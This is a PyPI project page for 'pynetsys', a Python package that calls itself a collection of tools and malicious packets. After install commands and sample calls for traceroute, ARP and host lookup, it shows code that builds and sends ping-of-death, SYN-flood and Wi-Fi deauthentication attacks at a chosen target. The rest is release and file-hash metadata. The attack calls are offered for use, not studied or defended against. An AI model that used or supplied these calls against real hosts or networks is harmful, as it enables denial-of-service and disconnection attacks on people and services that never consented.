pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets..
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
Create malicious packet and send
import pynetsys
PACKET, ID = packet(target = "example.org", attack = Packets.DEATH_PING)
start(PACKET, ID, _verbose = 0)
PACKET, ID = packet(target = "example.org", attack = Packets.SYN_FLOOD)
start(PACKET, ID, _verbose = 0)
PACKET, ID = packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
start(PACKET, ID, _verbose = 0)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pynetsys-0.0.3.tar.gz
(9.3 kB
view details)
Built Distribution
File details
Details for the file pynetsys-0.0.3.tar.gz
.
File metadata
- Download URL: pynetsys-0.0.3.tar.gz
- Upload date:
- Size: 9.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.8.0 pkginfo/1.8.2 readme-renderer/32.0 requests/2.27.1 requests-toolbelt/0.9.1 urllib3/1.26.8 tqdm/4.62.3 importlib-metadata/4.10.1 keyring/23.5.0 rfc3986/2.0.0 colorama/0.4.4 CPython/3.10.4
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 7fd88096e5e32f7fd6ae0a8587f9bf26707f947fd821949c63987ff4b0a19e2f |
|
MD5 | b644473e0ccd052c541bb1128b3451d0 |
|
BLAKE2b-256 | bc98990e5da2537e4571c79ab6bcc43bb1c3f9583f8911e87851f2fa9c97ab55 |
File details
Details for the file pynetsys-0.0.3-py3-none-any.whl
.
File metadata
- Download URL: pynetsys-0.0.3-py3-none-any.whl
- Upload date:
- Size: 9.6 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.8.0 pkginfo/1.8.2 readme-renderer/32.0 requests/2.27.1 requests-toolbelt/0.9.1 urllib3/1.26.8 tqdm/4.62.3 importlib-metadata/4.10.1 keyring/23.5.0 rfc3986/2.0.0 colorama/0.4.4 CPython/3.10.4
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 6147ffc41526670e8a97e6c99e7814f42fda9a1e78217d9c15f4adbade59cb1f |
|
MD5 | cd481617fd19763909731a017cb61895 |
|
BLAKE2b-256 | 37d80a77aba7eb37d07c65d6d0ec5bb4096d11ab2034a89a50054e288230e2b0 |